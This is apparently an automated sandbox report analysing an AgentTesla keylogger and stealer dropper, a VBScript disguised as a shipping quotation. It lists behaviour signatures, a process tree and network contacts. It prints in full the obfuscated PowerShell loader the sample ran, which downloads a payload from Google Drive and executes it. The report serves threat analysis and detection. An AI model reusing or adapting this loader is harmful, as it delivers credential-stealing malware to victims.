Malware Analysis Report

2024-11-13 14:21

Sample ID 240618-lkxn4sxfqe
Target MV ROYAL QUOTATION.vbs
SHA256 03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d
Tags
agenttesla execution keylogger spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d

Threat Level: Known bad

The file MV ROYAL QUOTATION.vbs was found to be: Known bad.

Malicious Activity Summary

agenttesla execution keylogger spyware stealer trojan

AgentTesla

Blocklisted process makes network request

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-18 09:36

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-18 09:36

Reported

2024-06-18 09:38

Platform

win7-20231129-en

Max time kernel

142s

Max time network

148s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MV ROYAL QUOTATION.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ip-api.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2308 set thread context of 2752 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1072 wrote to memory of 1172 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1072 wrote to memory of 1172 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1072 wrote to memory of 1172 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1172 wrote to memory of 2880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1172 wrote to memory of 2880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1172 wrote to memory of 2880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1172 wrote to memory of 2308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1172 wrote to memory of 2308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1172 wrote to memory of 2308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1172 wrote to memory of 2308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2308 wrote to memory of 1732 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2308 wrote to memory of 1732 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2308 wrote to memory of 1732 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2308 wrote to memory of 1732 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2308 wrote to memory of 2752 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2308 wrote to memory of 2752 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2308 wrote to memory of 2752 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2308 wrote to memory of 2752 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2308 wrote to memory of 2752 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2308 wrote to memory of 2752 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MV ROYAL QUOTATION.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle 1 "cls;$Enchisel = 1;$Skvt='ring';$Procreativity218='S';Function Tvivlesyg($tablehopped){$Strangulates=$tablehopped.Length-$Enchisel;$Stiksaars=$Procreativity218+'ubst'+$Skvt;For( $vaporisers=7;$vaporisers -lt $Strangulates;$vaporisers+=8){$Donnie+=$tablehopped.$Stiksaars.Invoke( $vaporisers, $Enchisel);}$Donnie;}function Oversway($Ynglestedernes){ . ($Hjemsgelse) ($Ynglestedernes);}$Tiplet=Tvivlesyg ' Sed.elMStershaoDidymisz Hurry.i AkvarilSy heeklinextr a unolog/Prisonf5Ioniser.Sultana0Plateau Topa,ol( PrinteWleukophiYdmygstnGldelsedkomediaoEndel,gw Mercedsblokker ,tabstaN Strst T Pr pre Grometr1 Perine0Brtsejl.Ukrnkel0Aa nend;cinquef A,venarWUndis,oi Impa.snra,gedn6i citat4Fundame;Unidyll E.ilicsx Antise6Sekunde4Furcife; Im,alm DramatirUnirascv L,erst:Program1Scattie2P.imrko1Rabbitl. Tampon0Serjean)Lgetsob Pesh.toGkontr leCantatoc bucibak.ncrankoEndoper/ Ophtha2Unossif0Plastom1Nulpunk0Ne vebu0Fulth,r1 Handma0Reformp1Beachhe GuldaldFKudizeoiUdgrfter rlenate,uccinifAciculuoaglipayxLnindeh/Resgues1avancem2Optaell1Startel.Forspil0Latente ';$Leucadendron=Tvivlesyg ' Au,optUAppeases .kkemoe,lankearT,aditi-NarcissAGiordang eje,doeSal.antn Kdva,etRefl ks ';$Enhardy=Tvivlesyg ' LaborahTri,ngut HjlpeptDriftsipGaleasesSvingta:Con lob/Subtaxo/vebgernd LairmerfremmeliKv.ddervInksta e ma,rop. Pr gragSmalskuo AdjudaoKlipning.loreatlBeseecheHaspnin.Autogencambulato Rentenm Unhurr/Daoinesu Samme.cEn iche?Paaskese Ko,sulxliflighpanhuggeo IdemanrChieft tRestbal=stoffrid Po.byco Rep,riwpa sionn Jeopa,lGalapagoBum.assaMessi.gdAldocoo&Gnidni.iKo.dnindOverdoz=F,ntina1Chassep_SceneriNExaratiXRisikobtComptinWCrappi L,ntipudoHvedemewIndoktrEDermatrLJoker eOT.rnebr3Adiat eAMentaluw Adminil,emalsnTRemolliGIm.atieXSuppl m2.raktatJ SeminaRbob,nerPOtoplasLIn.rejsdAdderesc JennetR Lyk,es1Reentraa.rstninXasnerscE HemidaRInvpegaJPaatage ';$Eigenvalues=Tvivlesyg ' gump.i>Fo.blff ';$Hjemsgelse=Tvivlesyg 'Arbejd.iAdjoin.eproduk x Skn.it ';$Stadselige='Bkkenbenets';$Woodspite = Tvivlesyg 'FlseneseBordskacKalciumhYclepedoKrystal Clurica%CosuretaCaveaeppmeningspBirdbatd DratteaKjllertt GelatiaTele.on%.odulud\OverhalSS,burbacNonscierFlaskeaoLokalavu,eathergUndersteKartone.Skraa eSBesin ewFjer,gtiSibbss. urbopr&Narcoti&Overmen Mongrele Aalbe.cQerssheh Skolelo Postlu sarco,otIndices ';Oversway (Tvivlesyg 'Trevang$Kighullg.ykologlKneepieoCon.umabTreeshiau,womanlOverbas: fagemeAOutpassfs.mbionfFa.tiglyFricatirInters,iFodboldnBebopp,gPeroliasLectorsr W.xinga Pr,ssimLangtrupPullulaeTeltligrAfpri,ns Kumysb=Sacchar( Eniguac aarg nmMangonedLaurasp Re.ogni/Teemingc D.ainl Smreri$Sho esfWPhrenoloUdkasteo Hypodidkropsvis fe.ledpSurfboaiUdgivelt Unboxee,allele)Avarit. ');Oversway (Tvivlesyg 'For,tag$girondeg F eratlTyvst,loHydrosebP.steuraR,ddersl Napole:SnderjyS .ommany Fordums KommistMonarkieUrigtigmAnte ebuTil,ager D utereKanoniss Tele n= Greesa$UnreplaE,tundern StillfhSurretoaGrac,lurSentimedSubgrapyParoemi. SkaktesU,municpSl,venel DispeoiSlakytetFos erh(Tmmermn$ CamphiENondea,iTrvejorg Denns,equidd enFelixspvBrudeudaFemtenalElleve.u trypsieGenkaldsPhiloso)Baarebu ');Oversway (Tvivlesyg 'special[OmodyniNCymricjeVilligstSvejsef.KvittepS UndeteeSta,darrUfordjevSup osaiRep imecTouchileVegetarP Hen,edoDechifriInterrunof entltInkenbuMNit,ogeaSorrywanLi,jesta Hipp,pgOrganise.xtradurrevolub]Plenumd: Subdue:ChannelSEanmisdeO.ersigcVgkon,auB,ttermrChoryzai,anhapitYngle.tycephaloPfoelgevrconcilio NonpertTrickiloOver,nccUnpenneo DrikkelSsonfor Ka ital= Iagtta Knebler[OparbejNnicolinebesmreltMellem,.overwovSTandemmeNominalcUnderglurodekasrTherma iBugcerttCr ftmayTemplesPButchesrRekogn.oBa,dendtEuascomoSystolicNichisroT.pehuslApodedeTFlugte.yAb,nnemp FiskeaeRemplac]Superex:Asexual:Mill,reT Emydinl,ryptodsCo,nect1Birkies2Pectina ');$Enhardy=$Systemures[0];$Hypokinetic= (Tvivlesyg 'Disk ej$Stt.epigHentydelFrak aloCochoncbErklrinaGlanspelAmylops:CecilsuMSubstanaCytostolDod eraiImper agMalars,nMelasseeGondr crAfs reds Konfig=TromsteN pottyseSor,seswKullagr- kmacroO FecalcbfaunernjFoder,ee,lonrevc M,ologt Oppo,i SunnsuStegneomy irenssA bejdstcoxorane AdminimDimers,. DiskofNRumak seLi.leskt veget .AprildaWAffronteMult.cibPass.viCVipstjelbegrebsiembou heZygomycn Bitbltt');$Hypokinetic+=$Affyringsrampers[1];Oversway ($Hypokinetic);Oversway (Tvivlesyg 'Cuisi,i$ SpindeMOnondaga DisketlRepavedi SyltetgObjectinW.lburte MemorarGastronsUndervi. FlocciH Kekchie A,toniaKppetordudho.deediatomar Strik,s Fa,tsa[Outyiel$TransskLIncur aeTropekluSmaaligcForhuseaSymp omd.rosaekeHustruenGoldenwdDistrahrProstatoyaroviznv ffelj]Syneriz=Overdra$SolicitTAnoeticij panvgpCapriccl MangeseForretntGrillst ');$Nonadjudicated=Tvivlesyg 'Agrom z$Ent popMFornaglaCycliselDescriai ConvengFastsaenpuckableUdbytterpreentes pfenni.magthavDEnaarinoIcterinwNotabiln He erolProduktoconspicaPana.ead,ubjectF eprousi avigel blgetrem,terin( Slutor$ AntiksE Photodn Stolpehtr.ssmaadiarkterMaharandUddeligyFrandse,.orklar$Blles.mO La.roioRainproc CitolayIrresonsMultivetKib ages G.stro)Ineff.r ';$Oocysts=$Affyringsrampers[0];Oversway (Tvivlesyg ' hirten$ FestligAdia.helAfbrksboVaterlibParaciuaOwllikel Boobie:Krim,krB Accouna bedsp,bImpingebTingfstlTonsilleDampdredReautho=Indeksa( NationTWaistcoeCubo des OvillutTirsdag- holismPOpmrksoaBrasnentStboldehMuskula Trusser$ForedesOContagioPerora.cFejteneyImdegaas Knifeptal.rmersu.fritn)udmugni ');while (!$Babbled) {Oversway (Tvivlesyg ' Fritlb$rv nessgUd,ortelDiskeseoSaxofonbHormoniaPreaddil Grns.f:tilregnM SlibesiBestiklcEldrev,rReassa.oGryntencDukkerthTi bageiKlatch,rCannonboSvitserpFjorte,tTrefoileRoo,aanrDatam.taSolvemenM dgaae=Piskefl$Uhin,retIllegalr Dekantu efraine Unname ') ;Oversway $Nonadjudicated;Oversway (Tvivlesyg 'D.celerSAlienatt irdleaBismethr Arb.ritSa.sons-SkemabuSK,astralAtticise elatineManifesp hunden patined4Vagnarb ');Oversway (Tvivlesyg 'Oligosy$FeifrefgSalgsvalAwe,lyioNonecumbOpgiveta BuckeylHydroae:Stear nBMerudgia Penetrb Fiskesbbureaucl Forttse Idiomedtrykfje=myxop.y(MalaromTHofjg.reUnprodesv,lkomst Deling-DyrepenPPoliovaapseudobtLitote h ensket Caddien$ An.ilsONonlarcoFlageolcGeophagy unparosSyvkantt Deft.ysMo oriz)Easies ') ;Oversway (Tvivlesyg 'Bio oci$StdpudegPimperilInsubduoStegebob.iruettaMilieutlHyp chr:Rig.andHDi ownayForpaknb HuslejaAnlg.panHiredsqt Fri.kehNerveliu GodvilsSawsmit=Central$S.rumalgTe sturlLimousio.adedlyb Selv,vaCoccololDyrenav: Huks,eGLavad laHewettil Def.ktl Regnspe.ryntprrManualeeGenstarnNimblewsSprregr2 Anti,i0Repe,ce4Isogona+Jul,aft+Cirklel%Torisnu$Soap laS Vicenty PulpstsTrimerit GennemeHuffilymB otheruPotentirCervicoeCyrillis Pr.imb.NoncalccSpaltepoVenten,uKrops.inRadi,let.midazo ') ;$Enhardy=$Systemures[$Hybanthus];}$Krigsfangers=349622;$Countermands=30457;Oversway (Tvivlesyg 'Monof a$Deu,schgUpharsil M.sedioFirlotbbTrngslea mpshemlStilett:skienssDSmallhoeKontr.lr Tudl,keUnbellilRantmuciKa ayafc Faste,tIndentusFormumn Lugsome= Indfoe EtageadGJededi eTrassertFe,iesy- LgformC ChequeoLytforvn Tr erstRecent.eUsaglignChessart bivoks Lyctida$ MetodiOBlousesoRivindfcprotegeyDisagresdromaeotEvidenssF.nansl ');Oversway (Tvivlesyg 'Pens,on$SkglavegLumenallSparekao R,glanb mellemaFrekvenlOverres:Brandmes Hy.ogenLuxembuaDybstrupCevichesAllove eAlexandtU,frsleiho agognSlvstolg SkjteseUnsamplt SmeltnsUmaleta T.xamet=Vaabenh Resorpt[ RibbonS,lkekarySkuddensB,ttinatsukkeute Supposm Combur. owbaneCOutdwelo Paillen PishogvUnbittie Au,oblrextrasctUnraile] Okse.u:Lyk,eop:DypningF LigedarRet.rdioFyge,anmExaminiBNereideata aceasAcajoubeGaldest6Dilata 4SildebeSSkjtendtillusiorTil.oldi Recursn PantstgMocking(Cabotin$NstmindD BlumineSpeditirWaddi.reStud relSelvforisprangscUdvirknt Semicosour,bie)Copepod ');Oversway (Tvivlesyg 'Dugperl$s,omatogFinhvallBivuakeoBli sedb Yobbo.aU listnlStrmmen: OpkrvnE PoleaxtU,elikah Platyro Chl rixAerodyniCook aseCunjergs Amaret1Citr.ll1Epoxyla9Skomage Depermi=konjunk Fyrr.tr[temp raSMejslinyTridimes ookhot ScenogedisgrosmHje meh. AerobaTfarvemee ReratexSystemptSjleso.. eltmarETartufinKursliscPalatoroBrushpodtredjegiGlyptotnGartnerg Presol] Gr ofx: Trying: TilthsALiddenfSTrellisCKkkenboIDaakalvIWhitesi. AnchisGSoftbale un,ramtCompartS KongretKrage.orSlaggedi OverponRullersgF shmou(outland$Tildigts PrevienForsknia Ra.finpkulbuelsDalstrgeHyperdit AerostiSubdepanHopefulg,ladderehemicyctEro.ogesBize.ma)P.rsone ');Oversway (Tvivlesyg 'Hypercy$Varpet.g,wiftenlLegatesoR ggersb,urisdiaNaturlolrocke s:StyringS PostichAftopnioMangilyvTrowabliMoskusknSubethfgNatbord=Theater$StichosEEkspo,etFysiurghbukse,noAloysiaxLemperui T gneseV.ndudssLushnes1 Brneli1Karenst9Purlgse.RetropesMilvusiuDubietibAntikvasFlappert BodhisrBrugskuiSalgsstn Coventg Dressm(Jernfor$ FintmaKP,leogerStrkni.i KrlgtegNonpenasRevendffTak,eska Cathetn F.ldepgLindedeeBesparerVerdenssVin,ues,Konkre,$ BespirCPosteroo SpegepuRaaglasnKarbonatSluddere Platear.nefuldm.anacetaForsty.nSoarer dSkriftesUnrem,t) A,hron ');Oversway $Shoving;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Enchisel = 1;$Skvt='ring';$Procreativity218='S';Function Tvivlesyg($tablehopped){$Strangulates=$tablehopped.Length-$Enchisel;$Stiksaars=$Procreativity218+'ubst'+$Skvt;For( $vaporisers=7;$vaporisers -lt $Strangulates;$vaporisers+=8){$Donnie+=$tablehopped.$Stiksaars.Invoke( $vaporisers, $Enchisel);}$Donnie;}function Oversway($Ynglestedernes){ . ($Hjemsgelse) ($Ynglestedernes);}$Tiplet=Tvivlesyg ' Sed.elMStershaoDidymisz Hurry.i AkvarilSy heeklinextr a unolog/Prisonf5Ioniser.Sultana0Plateau Topa,ol( PrinteWleukophiYdmygstnGldelsedkomediaoEndel,gw Mercedsblokker ,tabstaN Strst T Pr pre Grometr1 Perine0Brtsejl.Ukrnkel0Aa nend;cinquef A,venarWUndis,oi Impa.snra,gedn6i citat4Fundame;Unidyll E.ilicsx Antise6Sekunde4Furcife; Im,alm DramatirUnirascv L,erst:Program1Scattie2P.imrko1Rabbitl. Tampon0Serjean)Lgetsob Pesh.toGkontr leCantatoc bucibak.ncrankoEndoper/ Ophtha2Unossif0Plastom1Nulpunk0Ne vebu0Fulth,r1 Handma0Reformp1Beachhe GuldaldFKudizeoiUdgrfter rlenate,uccinifAciculuoaglipayxLnindeh/Resgues1avancem2Optaell1Startel.Forspil0Latente ';$Leucadendron=Tvivlesyg ' Au,optUAppeases .kkemoe,lankearT,aditi-NarcissAGiordang eje,doeSal.antn Kdva,etRefl ks ';$Enhardy=Tvivlesyg ' LaborahTri,ngut HjlpeptDriftsipGaleasesSvingta:Con lob/Subtaxo/vebgernd LairmerfremmeliKv.ddervInksta e ma,rop. Pr gragSmalskuo AdjudaoKlipning.loreatlBeseecheHaspnin.Autogencambulato Rentenm Unhurr/Daoinesu Samme.cEn iche?Paaskese Ko,sulxliflighpanhuggeo IdemanrChieft tRestbal=stoffrid Po.byco Rep,riwpa sionn Jeopa,lGalapagoBum.assaMessi.gdAldocoo&Gnidni.iKo.dnindOverdoz=F,ntina1Chassep_SceneriNExaratiXRisikobtComptinWCrappi L,ntipudoHvedemewIndoktrEDermatrLJoker eOT.rnebr3Adiat eAMentaluw Adminil,emalsnTRemolliGIm.atieXSuppl m2.raktatJ SeminaRbob,nerPOtoplasLIn.rejsdAdderesc JennetR Lyk,es1Reentraa.rstninXasnerscE HemidaRInvpegaJPaatage ';$Eigenvalues=Tvivlesyg ' gump.i>Fo.blff ';$Hjemsgelse=Tvivlesyg 'Arbejd.iAdjoin.eproduk x Skn.it ';$Stadselige='Bkkenbenets';$Woodspite = Tvivlesyg 'FlseneseBordskacKalciumhYclepedoKrystal Clurica%CosuretaCaveaeppmeningspBirdbatd DratteaKjllertt GelatiaTele.on%.odulud\OverhalSS,burbacNonscierFlaskeaoLokalavu,eathergUndersteKartone.Skraa eSBesin ewFjer,gtiSibbss. urbopr&Narcoti&Overmen Mongrele Aalbe.cQerssheh Skolelo Postlu sarco,otIndices ';Oversway (Tvivlesyg 'Trevang$Kighullg.ykologlKneepieoCon.umabTreeshiau,womanlOverbas: fagemeAOutpassfs.mbionfFa.tiglyFricatirInters,iFodboldnBebopp,gPeroliasLectorsr W.xinga Pr,ssimLangtrupPullulaeTeltligrAfpri,ns Kumysb=Sacchar( Eniguac aarg nmMangonedLaurasp Re.ogni/Teemingc D.ainl Smreri$Sho esfWPhrenoloUdkasteo Hypodidkropsvis fe.ledpSurfboaiUdgivelt Unboxee,allele)Avarit. ');Oversway (Tvivlesyg 'For,tag$girondeg F eratlTyvst,loHydrosebP.steuraR,ddersl Napole:SnderjyS .ommany Fordums KommistMonarkieUrigtigmAnte ebuTil,ager D utereKanoniss Tele n= Greesa$UnreplaE,tundern StillfhSurretoaGrac,lurSentimedSubgrapyParoemi. SkaktesU,municpSl,venel DispeoiSlakytetFos erh(Tmmermn$ CamphiENondea,iTrvejorg Denns,equidd enFelixspvBrudeudaFemtenalElleve.u trypsieGenkaldsPhiloso)Baarebu ');Oversway (Tvivlesyg 'special[OmodyniNCymricjeVilligstSvejsef.KvittepS UndeteeSta,darrUfordjevSup osaiRep imecTouchileVegetarP Hen,edoDechifriInterrunof entltInkenbuMNit,ogeaSorrywanLi,jesta Hipp,pgOrganise.xtradurrevolub]Plenumd: Subdue:ChannelSEanmisdeO.ersigcVgkon,auB,ttermrChoryzai,anhapitYngle.tycephaloPfoelgevrconcilio NonpertTrickiloOver,nccUnpenneo DrikkelSsonfor Ka ital= Iagtta Knebler[OparbejNnicolinebesmreltMellem,.overwovSTandemmeNominalcUnderglurodekasrTherma iBugcerttCr ftmayTemplesPButchesrRekogn.oBa,dendtEuascomoSystolicNichisroT.pehuslApodedeTFlugte.yAb,nnemp FiskeaeRemplac]Superex:Asexual:Mill,reT Emydinl,ryptodsCo,nect1Birkies2Pectina ');$Enhardy=$Systemures[0];$Hypokinetic= (Tvivlesyg 'Disk ej$Stt.epigHentydelFrak aloCochoncbErklrinaGlanspelAmylops:CecilsuMSubstanaCytostolDod eraiImper agMalars,nMelasseeGondr crAfs reds Konfig=TromsteN pottyseSor,seswKullagr- kmacroO FecalcbfaunernjFoder,ee,lonrevc M,ologt Oppo,i SunnsuStegneomy irenssA bejdstcoxorane AdminimDimers,. DiskofNRumak seLi.leskt veget .AprildaWAffronteMult.cibPass.viCVipstjelbegrebsiembou heZygomycn Bitbltt');$Hypokinetic+=$Affyringsrampers[1];Oversway ($Hypokinetic);Oversway (Tvivlesyg 'Cuisi,i$ SpindeMOnondaga DisketlRepavedi SyltetgObjectinW.lburte MemorarGastronsUndervi. FlocciH Kekchie A,toniaKppetordudho.deediatomar Strik,s Fa,tsa[Outyiel$TransskLIncur aeTropekluSmaaligcForhuseaSymp omd.rosaekeHustruenGoldenwdDistrahrProstatoyaroviznv ffelj]Syneriz=Overdra$SolicitTAnoeticij panvgpCapriccl MangeseForretntGrillst ');$Nonadjudicated=Tvivlesyg 'Agrom z$Ent popMFornaglaCycliselDescriai ConvengFastsaenpuckableUdbytterpreentes pfenni.magthavDEnaarinoIcterinwNotabiln He erolProduktoconspicaPana.ead,ubjectF eprousi avigel blgetrem,terin( Slutor$ AntiksE Photodn Stolpehtr.ssmaadiarkterMaharandUddeligyFrandse,.orklar$Blles.mO La.roioRainproc CitolayIrresonsMultivetKib ages G.stro)Ineff.r ';$Oocysts=$Affyringsrampers[0];Oversway (Tvivlesyg ' hirten$ FestligAdia.helAfbrksboVaterlibParaciuaOwllikel Boobie:Krim,krB Accouna bedsp,bImpingebTingfstlTonsilleDampdredReautho=Indeksa( NationTWaistcoeCubo des OvillutTirsdag- holismPOpmrksoaBrasnentStboldehMuskula Trusser$ForedesOContagioPerora.cFejteneyImdegaas Knifeptal.rmersu.fritn)udmugni ');while (!$Babbled) {Oversway (Tvivlesyg ' Fritlb$rv nessgUd,ortelDiskeseoSaxofonbHormoniaPreaddil Grns.f:tilregnM SlibesiBestiklcEldrev,rReassa.oGryntencDukkerthTi bageiKlatch,rCannonboSvitserpFjorte,tTrefoileRoo,aanrDatam.taSolvemenM dgaae=Piskefl$Uhin,retIllegalr Dekantu efraine Unname ') ;Oversway $Nonadjudicated;Oversway (Tvivlesyg 'D.celerSAlienatt irdleaBismethr Arb.ritSa.sons-SkemabuSK,astralAtticise elatineManifesp hunden patined4Vagnarb ');Oversway (Tvivlesyg 'Oligosy$FeifrefgSalgsvalAwe,lyioNonecumbOpgiveta BuckeylHydroae:Stear nBMerudgia Penetrb Fiskesbbureaucl Forttse Idiomedtrykfje=myxop.y(MalaromTHofjg.reUnprodesv,lkomst Deling-DyrepenPPoliovaapseudobtLitote h ensket Caddien$ An.ilsONonlarcoFlageolcGeophagy unparosSyvkantt Deft.ysMo oriz)Easies ') ;Oversway (Tvivlesyg 'Bio oci$StdpudegPimperilInsubduoStegebob.iruettaMilieutlHyp chr:Rig.andHDi ownayForpaknb HuslejaAnlg.panHiredsqt Fri.kehNerveliu GodvilsSawsmit=Central$S.rumalgTe sturlLimousio.adedlyb Selv,vaCoccololDyrenav: Huks,eGLavad laHewettil Def.ktl Regnspe.ryntprrManualeeGenstarnNimblewsSprregr2 Anti,i0Repe,ce4Isogona+Jul,aft+Cirklel%Torisnu$Soap laS Vicenty PulpstsTrimerit GennemeHuffilymB otheruPotentirCervicoeCyrillis Pr.imb.NoncalccSpaltepoVenten,uKrops.inRadi,let.midazo ') ;$Enhardy=$Systemures[$Hybanthus];}$Krigsfangers=349622;$Countermands=30457;Oversway (Tvivlesyg 'Monof a$Deu,schgUpharsil M.sedioFirlotbbTrngslea mpshemlStilett:skienssDSmallhoeKontr.lr Tudl,keUnbellilRantmuciKa ayafc Faste,tIndentusFormumn Lugsome= Indfoe EtageadGJededi eTrassertFe,iesy- LgformC ChequeoLytforvn Tr erstRecent.eUsaglignChessart bivoks Lyctida$ MetodiOBlousesoRivindfcprotegeyDisagresdromaeotEvidenssF.nansl ');Oversway (Tvivlesyg 'Pens,on$SkglavegLumenallSparekao R,glanb mellemaFrekvenlOverres:Brandmes Hy.ogenLuxembuaDybstrupCevichesAllove eAlexandtU,frsleiho agognSlvstolg SkjteseUnsamplt SmeltnsUmaleta T.xamet=Vaabenh Resorpt[ RibbonS,lkekarySkuddensB,ttinatsukkeute Supposm Combur. owbaneCOutdwelo Paillen PishogvUnbittie Au,oblrextrasctUnraile] Okse.u:Lyk,eop:DypningF LigedarRet.rdioFyge,anmExaminiBNereideata aceasAcajoubeGaldest6Dilata 4SildebeSSkjtendtillusiorTil.oldi Recursn PantstgMocking(Cabotin$NstmindD BlumineSpeditirWaddi.reStud relSelvforisprangscUdvirknt Semicosour,bie)Copepod ');Oversway (Tvivlesyg 'Dugperl$s,omatogFinhvallBivuakeoBli sedb Yobbo.aU listnlStrmmen: OpkrvnE PoleaxtU,elikah Platyro Chl rixAerodyniCook aseCunjergs Amaret1Citr.ll1Epoxyla9Skomage Depermi=konjunk Fyrr.tr[temp raSMejslinyTridimes ookhot ScenogedisgrosmHje meh. AerobaTfarvemee ReratexSystemptSjleso.. eltmarETartufinKursliscPalatoroBrushpodtredjegiGlyptotnGartnerg Presol] Gr ofx: Trying: TilthsALiddenfSTrellisCKkkenboIDaakalvIWhitesi. AnchisGSoftbale un,ramtCompartS KongretKrage.orSlaggedi OverponRullersgF shmou(outland$Tildigts PrevienForsknia Ra.finpkulbuelsDalstrgeHyperdit AerostiSubdepanHopefulg,ladderehemicyctEro.ogesBize.ma)P.rsone ');Oversway (Tvivlesyg 'Hypercy$Varpet.g,wiftenlLegatesoR ggersb,urisdiaNaturlolrocke s:StyringS PostichAftopnioMangilyvTrowabliMoskusknSubethfgNatbord=Theater$StichosEEkspo,etFysiurghbukse,noAloysiaxLemperui T gneseV.ndudssLushnes1 Brneli1Karenst9Purlgse.RetropesMilvusiuDubietibAntikvasFlappert BodhisrBrugskuiSalgsstn Coventg Dressm(Jernfor$ FintmaKP,leogerStrkni.i KrlgtegNonpenasRevendffTak,eska Cathetn F.ldepgLindedeeBesparerVerdenssVin,ues,Konkre,$ BespirCPosteroo SpegepuRaaglasnKarbonatSluddere Platear.nefuldm.anacetaForsty.nSoarer dSkriftesUnrem,t) A,hron ');Oversway $Shoving;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.169.33:443 drive.usercontent.google.com tcp
GB 142.250.187.238:443 drive.google.com tcp
